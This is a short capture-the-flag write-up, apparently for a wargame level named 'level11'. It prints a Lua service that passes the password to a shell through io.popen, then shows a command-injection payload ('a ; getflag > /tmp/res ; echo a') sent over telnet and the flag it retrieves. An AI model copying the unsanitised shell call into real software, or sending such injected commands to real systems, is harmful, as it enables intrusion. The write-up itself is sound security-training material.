There is just one file - lua script inside `level11` home directory.

Command: `cat level11.lua`  
Output: 
```
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))

function hash(pass)
  prog = io.popen("echo "..pass.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local l, err = client:receive()
  if not err then
      print("trying " .. l)
      local h = hash(l)

      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
          client:send("Erf nope..\n");
      else
          client:send("Gz you dumb*\n")
      end

  end

  client:close()
end
```

This script listens to incoming connections and asking for the password -> create hash `sha1` through `echo` ))) And after that, it compares the result with hardcoded hash, print some message and dies.

This script already running, so I just connected via `telnet` and infected the password field.

Command: `telnet 127.0.0.1 5151`   
Password filed: `a ; getflag > /tmp/res ; echo a `

Command: `cat /tmp/res`  
Output: `Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s`

Flag: `fa6v5ateaw21peobuub8ipe6s`